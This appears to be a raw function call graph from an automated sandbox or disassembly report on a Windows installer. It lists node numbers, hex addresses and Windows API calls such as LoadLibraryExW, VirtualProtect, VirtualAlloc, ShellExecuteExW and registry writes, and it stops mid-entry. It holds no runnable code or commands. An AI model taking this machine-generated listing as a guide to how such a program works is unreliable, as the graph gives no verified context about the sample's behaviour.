5369->5370 5370->5365 5371 404f31 4 API calls 5370->5371 5371->5363 5372 73b01000 5373 73b0101b 5 API calls 5372->5373 5374 73b01019 5373->5374 5375 4016f1 5376 402dcb 21 API calls 5375->5376 5377 4016f7 GetFullPathNameW 5376->5377 5378 401711 5377->5378 5379 401733 5377->5379 5378->5379 5382 4068d4 2 API calls 5378->5382 5380 401748 GetShortPathNameW 5379->5380 5381 402c4f 5379->5381 5380->5381 5383 401723 5382->5383 5383->5379 5385 406577 lstrcpynW 5383->5385 5385->5379 5386 401e73 GetDC 5387 402da9 21 API calls 5386->5387 5388 401e85 GetDeviceCaps MulDiv ReleaseDC 5387->5388 5389 402da9 21 API calls 5388->5389 5390 401eb6 5389->5390 5391 4065b4 21 API calls 5390->5391 5392 401ef3 CreateFontIndirectW 5391->5392 5393 40265d 5392->5393 5394 4014f5 SetForegroundWindow 5395 402c4f 5394->5395 5396 402975 5397 402dcb 21 API calls 5396->5397 5398 402981 5397->5398 5399 402997 5398->5399 5400 402dcb 21 API calls 5398->5400 5401 406042 2 API calls 5399->5401 5400->5399 5402 40299d 5401->5402 5424 406067 GetFileAttributesW CreateFileW 5402->5424 5404 4029aa 5405 402a60 5404->5405 5406 4029c5 GlobalAlloc 5404->5406 5407 402a48 5404->5407 5408 402a67 DeleteFileW 5405->5408 5409 402a7a 5405->5409 5406->5407 5410 4029de 5406->5410 5411 4032d9 35 API calls 5407->5411 5408->5409 5425 40350a SetFilePointer 5410->5425 5413 402a55 CloseHandle 5411->5413 5413->5405 5414 4029e4 5415 4034f4 ReadFile 5414->5415 5416 4029ed GlobalAlloc 5415->5416 5417 402a31 5416->5417 5418 4029fd 5416->5418 5419 406119 WriteFile 5417->5419 5420 4032d9 35 API calls 5418->5420 5421 402a3d GlobalFree 5419->5421 5422 402a0a 5420->5422 5421->5407 5423 402a28 GlobalFree 5422->5423 5423->5417 5424->5404 5425->5414 4733 403ff7 4734 404170 4733->4734 4735 40400f 4733->4735 4737 404181 GetDlgItem GetDlgItem 4734->4737 4738 4041c1 4734->4738 4735->4734 4736 40401b 4735->4736 4740 404026 SetWindowPos 4736->4740 4741 404039 4736->4741 4742 4044f6 22 API calls 4737->4742 4739 40421b 4738->4739 4747 401389 2 API calls 4738->4747 4743 404542 SendMessageW 4739->4743 4748 40416b 4739->4748 4740->4741 4744 404042 ShowWindow 4741->4744 4745 404084 4741->4745 4746 4041ab SetClassLongW 4742->4746 4774 40422d 4743->4774 4749 404062 GetWindowLongW 4744->4749 4750 40415d 4744->4750 4751 4040a3 4745->4751 4752 40408c DestroyWindow 4745->4752 4753 40140b 2 API calls 4746->4753 4756 4041f3 4747->4756 4749->4750 4758 40407b ShowWindow 4749->4758 4815 40455d 4750->4815 4754 4040a8 SetWindowLongW 4751->4754 4755 4040b9 4751->4755 4759 40447f 4752->4759 4753->4738 4754->4748 4755->4750 4760 4040c5 GetDlgItem 4755->4760 4756->4739 4761 4041f7 SendMessageW 4756->4761 4758->4745 4759->4748 4766 4044b0 ShowWindow 4759->4766 4764 4040f3 4760->4764 4765 4040d6 SendMessageW IsWindowEnabled 4760->4765 4761->4748 4762 40140b 2 API calls 4762->4774 4763 404481 DestroyWindow EndDialog 4763->4759 4768 404100 4764->4768 4771 404147 SendMessageW 4764->4771 4772 404113 4764->4772 4780 4040f8 4764->4780 4765->4748 4765->4764 4766->4748 4767 4065b4 21 API calls 4767->4774 4768->4771 4768->4780 4770 4044f6 22 API calls 4770->4774 4771->4750 4775 404130 4772->4775 4776 40411b 4772->4776 4773 40412e 4773->4750 4774->4748 4774->4762 4774->4763 4774->4767 4774->4770 4797 4043c1 DestroyWindow 4774->4797 4806 4044f6 4774->4806 4777 40140b 2 API calls 4775->4777 4778 40140b 2 API calls 4776->4778 4779 404137 4777->4779 4778->4780 4779->4750 4779->4780 4812 4044cf 4780->4812 4782 4042a8 GetDlgItem 4783 4042c5 ShowWindow KiUserCallbackDispatcher 4782->4783 4784 4042bd 4782->4784 4809 404518 KiUserCallbackDispatcher 4783->4809 4784->4783 4786 4042ef EnableWindow 4791 404303 4786->4791 4787 404308 GetSystemMenu EnableMenuItem SendMessageW 4788 404338 SendMessageW 4787->4788 4787->4791 4788->4791 4790 403fd8 22 API calls 4790->4791 4791->4787 4791->4790 4810 40452b SendMessageW 4791->4810 4811 406577 lstrcpynW 4791->4811 4793 404367 lstrlenW 4794 4065b4 21 API calls 4793->4794 4795 40437d SetWindowTextW 4794->4795 4796 401389 2 API calls 4795->4796 4796->4774 4797->4759 4798 4043db CreateDialogParamW 4797->4798 4798->4759 4799 40440e 4798->4799 4800 4044f6 22 API calls 4799->4800 4801 404419 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4800->4801 4802 401389 2 API calls 4801->4802 4803 40445f 4802->4803 4803->4748 4804 404467 ShowWindow 4803->4804 4805 404542 SendMessageW 4804->4805 4805->4759 4807 4065b4 21 API calls 4806->4807 4808 404501 SetDlgItemTextW 4807->4808 4808->4782 4809->4786 4810->4791 4811->4793 4813 4044d6 4812->4813 4814 4044dc SendMessageW 4812->4814 4813->4814 4814->4773 4816 404575 GetWindowLongW 4815->4816 4826 404620 4815->4826 4817 40458a 4816->4817 4816->4826 4818 4045b7 GetSysColor 4817->4818 4819 4045ba 4817->4819 4817->4826 4818->4819 4820 4045c0 SetTextColor 4819->4820 4821 4045ca SetBkMode 4819->4821 4820->4821 4822 4045e2 GetSysColor 4821->4822 4823 4045e8 4821->4823 4822->4823 4824 4045f9 4823->4824 4825 4045ef SetBkColor 4823->4825 4824->4826 4827 404613 CreateBrushIndirect 4824->4827 4828 40460c DeleteObject 4824->4828 4825->4824 4826->4748 4827->4826 4828->4827 5426 40197b 5427 402dcb 21 API calls 5426->5427 5428 401982 lstrlenW 5427->5428 5429 40265d 5428->5429 4879 4020fd 4880 40210f 4879->4880 4890 4021c1 4879->4890 4881 402dcb 21 API calls 4880->4881 4882 402116 4881->4882 4884 402dcb 21 API calls 4882->4884 4883 401423 28 API calls 4885 40231b 4883->4885 4886 40211f 4884->4886 4887 402135 LoadLibraryExW 4886->4887 4888 402127 GetModuleHandleW 4886->4888 4889 402146 4887->4889 4887->4890 4888->4887 4888->4889 4902 4069da 4889->4902 4890->4883 4893 402190 4895 4055fc 28 API calls 4893->4895 4894 402157 4896 402176 4894->4896 4897 40215f 4894->4897 4898 402167 4895->4898 4907 73b01817 4896->4907 4899 401423 28 API calls 4897->4899 4898->4885 4900 4021b3 FreeLibrary 4898->4900 4899->4898 4900->4885 4949 406599 WideCharToMultiByte 4902->4949 4904 4069f7 4905 4069fe GetProcAddress 4904->4905 4906 402151 4904->4906 4905->4906 4906->4893 4906->4894 4908 73b0184a 4907->4908 4950 73b01bff 4908->4950 4910 73b01851 4911 73b01976 4910->4911 4912 73b01862 4910->4912 4913 73b01869 4910->4913 4911->4898 5000 73b0243e 4912->5000 4984 73b02480 4913->4984 4918 73b018cd 4924 73b018d3 4918->4924 4925 73b0191e 4918->4925 4919 73b018af 5013 73b02655 4919->5013 4920 73b01898 4934 73b0188e 4920->4934 5010 73b02e23 4920->5010 4921 73b0187f 4923 73b01885 4921->4923 4928 73b01890 4921->4928 4923->4934 4994 73b02b98 4923->4994 5032 73b01666 4924->5032 4926 73b02655 10 API calls 4925->4926 4932 73b0190f 4926->4932 4927 73b018b5 5024 73b01654 4927->5024 5004 73b02810 4928->5004 4948 73b01965 4932->4948 5038 73b02618 4932->5038 4934->4918 4934->4919 4938 73b01896 4938->4934 4939 73b02655 10 API calls 4939->4932 4943 73b0196f GlobalFree 4943->4911 4945 73b01951 4945->4948 5042 73b015dd wsprintfW 4945->5042 4946 73b0194a FreeLibrary 4946->4945 4948->4911 4948->4943 4949->4904 5045 73b012bb GlobalAlloc 4950->5045 4952 73b01c26 5046 73b012bb GlobalAlloc 4952->5046 4954 73b01e6b GlobalFree GlobalFree GlobalFree 4956 73b01e88 4954->4956 4961 73b01ed2 4954->4961 4955 73b01c31 4955->4954 4959 73b01d26 GlobalAlloc 4955->4959 4955->4961 4962 73b01d71 lstrcpyW 4955->4962 4963 73b01d8f GlobalFree 4955->4963 4966 73b01d7b lstrcpyW 4955->4966 4968 73b02126 4955->4968 4975 73b02067 GlobalFree 4955->4975 4976 73b021ae 4955->4976 4978 73b012cc 2 API calls 4955->4978 4979 73b01dcd 4955->4979 4957 73b01e9d 4956->4957 4958 73b0227e 4956->4958 4956->4961 4957->4961 5049 73b012cc 4957->5049 4960 73b022a0 GetModuleHandleW 4958->4960 4958->4961 4959->4955 4964 73b022b1 LoadLibraryW 4960->4964 4965 73b022c6 4960->4965 4961->4910 4962->4966 4963->4955 4964->4961 4964->4965 5053 73b016bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4965->5053 4966->4955 5052 73b012bb GlobalAlloc 4968->5052 4969 73b02318 4969->4961 4971 73b02325 lstrlenW 4969->4971 5054 73b016bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4971->5054 4973 73b022d8 4973->4969 4982 73b02302 GetProcAddress 4973->4982 4975->4955 4976->4961 4981 73b02216 lstrcpyW 4976->4981 4977 73b0233f 4977->4961 4978->4955 4979->4955 5047 73b0162f GlobalSize GlobalAlloc 4979->5047 4981->4961 4982->4969 4983 73b0212f 4983->4910 4985 73b02498 4984->4985 4987 73b025c1 GlobalFree 4985->4987 4989 73b02540 GlobalAlloc WideCharToMultiByte 4985->4989 4990 73b0256b GlobalAlloc 4985->4990 4991 73b012cc GlobalAlloc lstrcpynW 4985->4991 4992 73b02582 4985->4992 5056 73b0135a 4985->5056 4987->4985 4988 73b0186f 4987->4988 4988->4920 4988->4921 4988->4934 4989->4987 4990->4992 4991->4985 4992->4987 5060 73b027a4 4992->5060 4996 73b02baa 4994->4996 4995 73b02c4f CreateFileA 4999 73b02c6d 4995->4999 4996->4995 4998 73b02d39 4998->4934 5063 73b02b42 4999->5063 5001 73b02453 5000->5001 5002 73b0245e GlobalAlloc 5001->5002 5003 73b01868 5001->5003 5002->5001 5003->4913 5008 73b02840 5004->5008 5005 73b028db GlobalAlloc 5009 73b028fe 5005->5009 5006 73b028ee 5007 73b028f4 GlobalSize 5006->5007 5006->5009 5007->5009 5008->5005 5008->5006 5009->4938 5011 73b02e2e 5010->5011 5012 73b02e6e GlobalFree 5011->5012 5067 73b012bb GlobalAlloc 5013->5067 5015 73b0265f 5016 73b026d8 MultiByteToWideChar 5015->5016 5017 73b026fa StringFromGUID2 5015->5017 5018 73b0270b lstrcpynW 5015->5018 5019 73b0271e wsprintfW 5015->5019 5020 73b02742 GlobalFree 5015->5020 5021 73b02777 GlobalFree 5015->5021 5022 73b01312 2 API calls 5015->5022 5068 73b01381 5015->5068 5016->5015 5017->5015 5018->5015 5019->5015 5020->5015 5021->4927 5022->5015 5072 73b012bb GlobalAlloc 5024->5072 5026 73b01659 5027 73b01666 2 API calls 5026->5027 5028 73b01663 5027->5028 5029 73b01312 5028->5029 5030 73b01355 GlobalFree 5029->5030 5031 73b0131b GlobalAlloc lstrcpynW 5029->5031 5030->4932 5031->5030 5033 73b01672 wsprintfW 5032->5033 5035 73b0169f lstrcpyW 5032->5035 5037 73b016b8 5033->5037 5035->5037 5037->4939 5039 73b02626 5038->5039 5041 73b01931 5038->5041 5040 73b02642 GlobalFree 5039->5040 5039->5041 5040->5039 5041->4945 5041->4946 5043 73b01312 2 API calls 5042->5043 5044 73b015fe 5043->5044 5044->4948 5045->4952 5046->4955 5048 73b0164d 5047->5048 5048->4979 5055 73b012bb GlobalAlloc 5049->5055 5051 73b012db lstrcpynW 5051->4961 5052->4983 5053->4973 5054->4977 5055->5051 5057 73b01361 5056->5057 5058 73b012cc 2 API calls 5057->5058 5059 73b0137f 5058->5059 5059->4985 5061 73b027b2 VirtualAlloc 5060->5061 5062 73b02808 5060->5062 5061->5062 5062->4992 5064 73b02b4d 5063->5064 5065 73b02b52 GetLastError 5064->5065 5066 73b02b5d 5064->5066 5065->5066 5066->4998 5067->5015 5069 73b0138a 5068->5069 5070 73b013ac 5068->5070 5069->5070 5071 73b01390 lstrcpyW 5069->5071 5070->5015 5071->5070 5072->5026 5430 73b0170d 5431 73b015b6 GlobalFree 5430->5431 5433 73b01725 5431->5433 5432 73b0176b GlobalFree 5433->5432 5434 73b01740 5433->5434 5435 73b01757 VirtualFree 5433->5435 5434->5432 5435->5432 5436 402b7e 5437 402bd0 5436->5437 5438 402b85 5436->5438 5439 40696b 5 API calls 5437->5439 5440 402bce 5438->5440 5442 402da9 21 API calls 5438->5442 5441 402bd7 5439->5441 5444 402dcb 21 API calls 5441->5444 5443 402b93 5442->5443 5445 402da9 21 API calls 5443->5445 5446 402be0 5444->5446 5449 402b9f 5445->5449 5446->5440 5447 402be4 IIDFromString 5446->5447 5447->5440 5448 402bf3 5447->5448 5448->5440 5454 406577 lstrcpynW 5448->5454 5453 4064be wsprintfW 5449->5453 5451 402c10 CoTaskMemFree 5451->5440 5453->5440 5454->5451 5455 401000 5456 401037 BeginPaint GetClientRect 5455->5456 5457 40100c DefWindowProcW 5455->5457 5459 4010f3 5456->5459 5460 401179 5457->5460 5461 401073 CreateBrushIndirect FillRect DeleteObject 5459->5461 5462 4010fc 5459->5462 5461->5459 5463 401102 CreateFontIndirectW 5462->5463 5464 401167 EndPaint 5462->5464 5463->5464 5465 401112 6 API calls 5463->5465 5464->5460 5465->5464 4018 401781 4024 402dcb 4018->4024 4022 40178f 4023 406096 2 API calls 4022->4023 4023->4022 4025 402dd7 4024->4025 4026 4065b4 21 API calls 4025->4026 4027 402df8 4026->4027 4028 401788 4027->4028 4029 406825 5 API calls 4027->4029 4030 406096 4028->4030 4029->4028 4031 4060a3 GetTickCount GetTempFileNameW 4030->4031 4032 4060d9 4031->4032 4033 4060dd 4031->4033 4032->4031 4032->4033 4033->4022 5466 401d82 5467 402da9 21 API calls 5466->5467 5468 401d93 SetWindowLongW 5467->5468 5469 402c4f 5468->5469 4054 401f03 4055 402da9 21 API calls 4054->4055 4056 401f09 4055->4056 4057 402da9 21 API calls 4056->4057 4058 401f15 4057->4058 4059 401f21 ShowWindow 4058->4059 4060 401f2c EnableWindow 4058->4060 4061 402c4f 4059->4061 4060->4061 5470 401503 5471 401508 5470->5471 5473 40152e 5470->5473 5472 402da9 21 API calls 5471->5472 5472->5473 5474 402903 5475 40290b 5474->5475 5476 40290f FindNextFileW 5475->5476 5478 402921 5475->5478 5477 402968 5476->5477 5476->5478 5480 406577 lstrcpynW 5477->5480 5480->5478 5481 73b01774 5482 73b017a3 5481->5482 5483 73b01bff 22 API calls 5482->5483 5484 73b017aa 5483->5484 5485 73b017b1 5484->5485 5486 73b017bd 5484->5486 5487 73b01312 2 API calls 5485->5487 5488 73b017e4 5486->5488 5489 73b017c7 5486->5489 5492 73b017bb 5487->5492 5490 73b017ea 5488->5490 5491 73b0180e 5488->5491 5493 73b015dd 3 API calls 5489->5493 5494 73b01654 3 API calls 5490->5494 5495 73b015dd 3 API calls 5491->5495 5496 73b017cc 5493->5496 5497 73b017ef 5494->5497 5495->5492 5498 73b01654 3 API calls 5496->5498 5500 73b01312 2 API calls 5497->5500 5499 73b017d2 5498->5499 5501 73b01312 2 API calls 5499->5501 5502 73b017f5 GlobalFree 5500->5502 5503 73b017d8 GlobalFree 5501->5503 5502->5492 5504 73b01809 GlobalFree 5502->5504 5503->5492 5504->5492 5505 403c07 5506 403c12 5505->5506 5507 403c16 5506->5507 5508 403c19 GlobalAlloc 5506->5508 5508->5507 5509 401588 5510 402bc9 5509->5510 5513 4064be wsprintfW 5510->5513 5512 402bce 5513->5512 5514 73b01979 5515 73b0199c 5514->5515 5516 73b019d1 GlobalFree 5515->5516 5517 73b019e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5515->5517 5516->5517 5518 73b01312 2 API calls 5517->5518 5519 73b01b6e GlobalFree GlobalFree 5518->5519 5520 40198d 5521 402da9 21 API calls 5520->5521 5522 401994 5521->5522 5523 402da9 21 API calls 5522->5523 5524 4019a1 5523->5524 5525 402dcb 21 API calls 5524->5525 5526 4019b8 lstrlenW 5525->5526 5528 4019c9 5526->5528 5527 401a0a 5528->5527 5532 406577 lstrcpynW 5528->5532 5530 4019fa 5530->5527 5531 4019ff lstrlenW 5530->5531 5531->5527 5532->5530 4117 73b02a7f 4118 73b02acf 4117->4118 4119 73b02a8f VirtualProtect 4117->4119 4119->4118 5533 40168f 5534 402dcb 21 API calls 5533->5534 5535 401695 5534->5535 5536 4068d4 2 API calls 5535->5536 5537 40169b 5536->5537 5538 402b10 5539 402da9 21 API calls 5538->5539 5540 402b16 5539->5540 5541 4065b4 21 API calls 5540->5541 5542 402953 5540->5542 5541->5542 4120 402711 4121 402da9 21 API calls 4120->4121 4130 402720 4121->4130 4122 40285d 4123 40276a ReadFile 4123->4122 4123->4130 4124 402803 4124->4122 4124->4130 4134 406148 SetFilePointer 4124->4134 4126 4027aa MultiByteToWideChar 4126->4130 4127 40285f 4145 4064be wsprintfW 4127->4145 4130->4122 4130->4123 4130->4124 4130->4126 4130->4127 4131 4027d0 SetFilePointer MultiByteToWideChar 4130->4131 4132 402870 4130->4132 4143 4060ea ReadFile 4130->4143 4131->4130 4132->4122 4133 402891 SetFilePointer 4132->4133 4133->4122 4135 406164 4134->4135 4138 40617c 4134->4138 4136 4060ea ReadFile 4135->4136 4137 406170 4136->4137 4137->4138 4139 406185 SetFilePointer 4137->4139 4140 4061ad SetFilePointer 4137->4140 4138->4124 4139->4140 4141 406190 4139->4141 4140->4138 4146 406119 WriteFile 4141->4146 4144 406108 4143->4144 4144->4130 4145->4122 4147 406137 4146->4147 4147->4138 5543 401491 5544 4055fc 28 API calls 5543->5544 5545 401498 5544->5545 5546 73b010e1 5547 73b01111 5546->5547 5548 73b012b0 GlobalFree 5547->5548 5549 73b01240 GlobalFree 5547->5549 5550 73b011d7 GlobalAlloc 5547->5550 5551 73b0135a 2 API calls 5547->5551 5552 73b012ab 5547->5552 5553 73b01312 2 API calls 5547->5553 5554 73b0129a GlobalFree 5547->5554 5555 73b01381 lstrcpyW 5547->5555 5556 73b0116b GlobalAlloc 5547->5556 5549->5547 5550->5547 5551->5547 5552->5548 5553->5547 5554->5547 5555->5547 5556->5547 4550 401794 4551 402dcb 21 API calls 4550->4551 4552 40179b 4551->4552 4553 4017c3 4552->4553 4554 4017bb 4552->4554 4591 406577 lstrcpynW 4553->4591 4590 406577 lstrcpynW 4554->4590 4557 4017c1 4561 406825 5 API calls 4557->4561 4558 4017ce 4559 405e46 3 API calls 4558->4559 4560 4017d4 lstrcatW 4559->4560 4560->4557 4578 4017e0 4561->4578 4562 4068d4 2 API calls 4562->4578 4563 40181c 4564 406042 2 API calls 4563->4564 4564->4578 4566 4017f2 CompareFileTime 4566->4578 4567 4018b2 4569 4055fc 28 API calls 4567->4569 4568 401889 4571 4055fc 28 API calls 4568->4571 4579 40189e 4568->4579 4570 4018bc 4569->4570 4572 4032d9 35 API calls 4570->4572 4571->4579 4574 4018cf 4572->4574 4573 406577 lstrcpynW 4573->4578 4575 4018e3 SetFileTime 4574->4575 4577 4018f5 CloseHandle 4574->4577 4575->4577 4576 4065b4 21 API calls 4576->4578 4577->4579 4580 401906 4577->4580 4578->4562 4578->4563 4578->4566 4578->4567 4578->4568 4578->4573 4578->4576 4586 405bd7 MessageBoxIndirectW 4578->4586 4589 406067 GetFileAttributesW CreateFileW 4578->4589 4581 40190b 4580->4581 4582 40191e 4580->4582 4584 4065b4 21 API calls 4581->4584 4583 4065b4 21 API calls 4582->4583 4585 401926 4583->4585 4587 401913 lstrcatW 4584->4587 4585->4579 4588 405bd7 MessageBoxIndirectW 4585->4588 4586->4578 4587->4585 4588->4579 4589->4578 4590->4557 4591->4558 5557 401a97 5558 402da9 21 API calls 5557->5558 5559 401aa0 5558->5559 5560 402da9 21 API calls 5559->5560 5561 401a45 5560->5561 4597 401598 4598 4015b1 4597->4598 4599 4015a8 ShowWindow 4597->4599 4600 402c4f 4598->4600 4601 4015bf ShowWindow 4598->4601 4599->4598 4601->4600 4633 402419 4634 402dcb 21 API calls 4633->4634 4635 402428 4634->4635 4636 402dcb 21 API calls 4635->4636 4637 402431 4636->4637 4638 402dcb 21 API calls 4637->4638 4639 40243b GetPrivateProfileStringW 4638->4639 5562 73b023e9 5563 73b02453 5562->5563 5564 73b0245e GlobalAlloc 5563->5564 5565 73b0247d 5563->5565 5564->5563 5566 40201b 5567 402dcb 21 API calls 5566->5567 5568 402022 5567->5568 5569 4068d4 2 API calls 5568->5569 5570 402028 5569->5570 5572 402039 5570->5572 5573 4064be wsprintfW 5570->5573 5573->5572 5574 401b9c 5575 402dcb 21 API calls 5574->5575 5576 401ba3 5575->5576 5577 402da9 21 API calls 5576->5577 5578 401bac wsprintfW 5577->5578 5579 402c4f 5578->5579 4640 405b9d ShellExecuteExW 5580 40149e 5581 4023c2 5580->5581 5582 4014ac PostQuitMessage 5580->5582 5582->5581 4641 4016a0 4642 402dcb 21 API calls 4641->4642 4643 4016a7 4642->4643 4644 402dcb 21 API calls 4643->4644 4645 4016b0 4644->4645 4646 402dcb 21 API calls 4645->4646 4647 4016b9 MoveFileW 4646->4647 4648 4016cc 4647->4648 4654 4016c5 4647->4654 4649 4068d4 2 API calls 4648->4649 4652 40231b 4648->4652 4651 4016db 4649->4651 4651->4652 4653 406337 40 API calls 4651->4653 4653->4654 4655 401423 4654->4655 4656 4055fc 28 API calls 4655->4656 4657 401431 4656->4657 4657->4652 5583 4049a0 5584 4049b0 5583->5584 5585 4049d6 5583->5585 5587 4044f6 22 API calls 5584->5587 5586 40455d 8 API calls 5585->5586 5588 4049e2 5586->5588 5589 4049bd SetDlgItemTextW 5587->5589 5589->5585 4658 402324 4659 402dcb 21 API calls 4658->4659 4660 40232a 4659->4660 4661 402dcb 21 API calls 4660->4661 4662 402333 4661->4662 4663 402dcb 21 API calls 4662->4663 4664 40233c 4663->4664 4665 4068d4 2 API calls 4664->4665 4666 402345 4665->4666 4667 402356 lstrlenW lstrlenW 4666->4667 4671 402349 4666->4671 4669 4055fc 28 API calls 4667->4669 4668 4055fc 28 API calls 4672 402351 4668->4672 4670 402394 SHFileOperationW 4669->4670 4670->4671 4670->4672 4671->4668 4671->4672 5590 401a24 5591 402dcb 21 API calls 5590->5591 5592 401a2b 5591->5592 5593 402dcb 21 API calls 5592->5593 5594 401a34 5593->5594 5595 401a3b lstrcmpiW 5594->5595 5596 401a4d lstrcmpW 5594->5596 5597 401a41 5595->5597 5596->5597 5598 401da6 5599 401db9 GetDlgItem 5598->5599 5600 401dac 5598->5600 5602 401db3 5599->5602 5601 402da9 21 API calls 5600->5601 5601->5602 5603 401dfa GetClientRect LoadImageW SendMessageW 5602->5603 5604 402dcb 21 API calls 5602->5604 5606 401e58 5603->5606 5608 401e64 5603->5608 5604->5603 5607 401e5d DeleteObject 5606->5607 5606->5608 5607->5608 5609 4023a8 5610 4023c2 5609->5610 5611 4023af 5609->5611 5612 4065b4 21 API calls 5611->5612 5613 4023bc 5612->5613 5613->5610 5614 405bd7 MessageBoxIndirectW 5613->5614 5614->5610 5615 73b01058 5617 73b01074 5615->5617 5616 73b010dd 5617->5616 5618 73b015b6 GlobalFree 5617->5618 5619 73b01092 5617->5619 5618->5619 5620 73b015b6 GlobalFree 5619->5620 5621 73b010a2 5620->5621 5622 73b010b2 5621->5622 5623 73b010a9 GlobalSize 5621->5623 5624 73b010b6 GlobalAlloc 5622->5624 5625 73b010c7 5622->5625 5623->5622 5626 73b015dd 3 API calls 5624->5626 5627 73b010d2 GlobalFree 5625->5627 5626->5625 5627->5616 5628 402c2a SendMessageW 5629 402c44 InvalidateRect 5628->5629 5630 402c4f 5628->5630 5629->5630 5631 40462c lstrcpynW lstrlenW 4699 4024af 4700 402dcb 21 API calls 4699->4700 4701 4024c1 4700->4701 4702 402dcb 21 API calls 4701->4702 4703 4024cb 4702->4703 4716 402e5b 4703->4716 4706 402c4f 4707 402503 4710 402da9 21 API calls 4707->4710 4712 40250f 4707->4712 4708 402dcb 21 API calls 4709 4024f9 lstrlenW 4708->4709 4709->4707 4710->4712 4711 40252e RegSetValueExW 4714 402544 RegCloseKey 4711->4714 4712->4711 4713 4032d9 35 API calls 4712->4713 4713->4711 4714->4706 4717 402e76 4716->4717 4720 406412 4717->4720 4721 406421 4720->4721 4722 4024db 4721->4722 4723 40642c RegCreateKeyExW 4721->4723 4722->4706 4722->4707 4722->4708 4723->4722 5632 402930 5633 402dcb 21 API calls 5632->5633 5634 402937 FindFirstFileW 5633->5634 5635 40295f 5634->5635 5639 40294a 5634->5639 5636 402968 5635->5636 5640 4064be wsprintfW 5635->5640 5641 406577 lstrcpynW 5636->5641 5640->5636 5641->5639 5642 401931 5643 401968 5642->5643 5644 402dcb 21 API calls 5643->5644 5645 40196d 5644->5645 5646 405c83 71 API calls 5645->5646 5647 401976 5646->5647 5648 73b02d43 5649 73b02d5b 5648->5649 5650 73b0162f 2 API calls 5649->5650 5651 73b02d76 5650->5651 5652 401934 5653 402dcb 21 API calls 5652->5653 5654 40193b 5653->5654 5655 405bd7 MessageBoxIndirectW 5654->5655 5656 401944 5655->5656 5657 4046b5 5658 4047e7 5657->5658 5659 4046cd 5657->5659 5660 404851 5658->5660 5662 40491b 5658->5662 5668 404822 GetDlgItem SendMessageW 5658->5668 5665 4044f6 22 API calls 5659->5665 5661 40485b GetDlgItem 5660->5661 5660->5662 5663 404875 5661->5663 5664 4048dc 5661->5664 5667 40455d 8 API calls 5662->5667 5663->5664 5671 40489b SendMessageW LoadCursorW SetCursor 5663->5671 5664->5662 5672 4048ee 5664->5672 5666 404734 5665->5666 5669 4044f6 22 API calls 5666->5669 5670 404916 5667->5670 5690 404518 KiUserCallbackDispatcher 5668->5690 5674 404741 CheckDlgButton 5669->5674 5691 404964 5671->5691 5676 404904 5672->5676 5677 4048f4 SendMessageW 5672->5677 5688 404518 KiUserCallbackDispatcher 5674->5688 5676->5670 5682 40490a SendMessageW 5676->5682 5677->5676 5678 40484c 5679 404940 SendMessageW 5678->5679 5679->5660 5682->5670 5683 40475f GetDlgItem 5689 40452b SendMessageW 5683->5689 5685 404775 SendMessageW 5686 404792 GetSysColor 5685->5686 5687 40479b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5685->5687 5686->5687 5687->5670 5688->5683 5689->5685 5690->5678 5694 405b9d ShellExecuteExW 5691->5694 5693 4048ca LoadCursorW SetCursor 5693->5664 5694->5693 4724 4028b6 4725 4028bd 4724->4725 4726 402bce 4724->4726 4727 402da9 21 API calls 4725->4727 4728 4028c4 4727->4728 4729 4028d3 SetFilePointer 4728->4729 4729->4726 4730 4028e3 4729->4730 4732 4064be wsprintfW 4730->4732 4732->4726 5695 401f37 5696 402dcb 21 API calls 5695->5696 5697 401f3d 5696->5697 5698 402dcb 21 API calls 5697->5698 5699 401f46 5698->5699 5700 402dcb 21 API calls 5699->5700 5701 401f4f 5700->5701 5702 402dcb 21 API calls 5701->5702 5703 401f58 5702->5703 5704 401423 28 API calls 5703->5704 5705 401f5f 5704->5705 5712 405b9d ShellExecuteExW 5705->5712 5707 401fa7 5708 406a16 5 API calls 5707->5708 5710 402953 5707->5710 5709 401fc4 CloseHandle 5708->5709 5709->5710 5712->5707 5713 4014b8 5714 4014be 5713->5714 5715 401389 2 API calls 5714->5715 5716 4014c6 5715->5716 5717 402fb8 5718 402fe3 5717->5718 5719 402fca SetTimer 5717->5719 5720 403038 5718->5720 5721 402ffd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5718->5721 5719->5718 5721->5720 4829 40573b 4830 4058e5 4829->4830 4831 40575c GetDlgItem GetDlgItem GetDlgItem 4829->4831 4833 405916 4830->4833 4834 4058ee GetDlgItem CreateThread CloseHandle 4830->4834 4875 40452b SendMessageW 4831->4875 4835 405941 4833->4835 4839 405966 4833->4839 4840 40592d ShowWindow ShowWindow 4833->4840 4834->4833 4878 4056cf 5 API calls 4834->4878 4836 4059a1 4835->4836 4837 40594d 4835->4837 4836->4839 4852 4059af SendMessageW 4836->4852 4841 405955 4837->4841 4842 40597b ShowWindow 4837->4842 4838 4057cc 4844 4057d3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4838->4844 4843 40455d 8 API calls 4839->4843 4877 40452b SendMessageW 4840->4877 4846 4044cf SendMessageW 4841->4846 4848 40599b 4842->4848 4849 40598d 4842->4849 4847 405974 4843->4847 4850 405841 4844->4850 4851 405825 SendMessageW SendMessageW 4844->4851 4846->4839 4854 4044cf SendMessageW 4848->4854 4853 4055fc 28 API calls 4849->4853 4855 405854 4850->4855 4856 405846 SendMessageW 4850->4856 4851->4850 4852->4847 4857 4059c8 CreatePopupMenu 4852->4857 4853->4848 4854->4836 4859 4044f6 22 API calls 4855->4859 4856->4855 4858 4065b4 21 API calls 4857->4858 4860 4059d8 AppendMenuW 4858->4860 4861 405864 4859->4861 4862 4059f5 GetWindowRect 4860->4862 4863 405a08 TrackPopupMenu 4860->4863 4864 4058a1 GetDlgItem SendMessageW 4861->4864 4865 40586d ShowWindow 4861->4865 4862->4863 4863->4847 4866 405a23 4863->4866 4864->4847 4869 4058c8 SendMessageW SendMessageW 4864->4869 4867 405890 4865->4867 4868 405883 ShowWindow 4865->4868 4870 405a3f SendMessageW 4866->4870 4876 40452b SendMessageW 4867->4876 4868->4867 4869->4847 4870->4870 4871 405a5c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4870->4871 4873 405a81 SendMessageW 4871->4873 4873->4873 4874 405aaa GlobalUnlock SetClipboardData CloseClipboard 4873->4874 4874->4847 4875->4838 4876->4864 4877->4835 5722 401d3c 5723 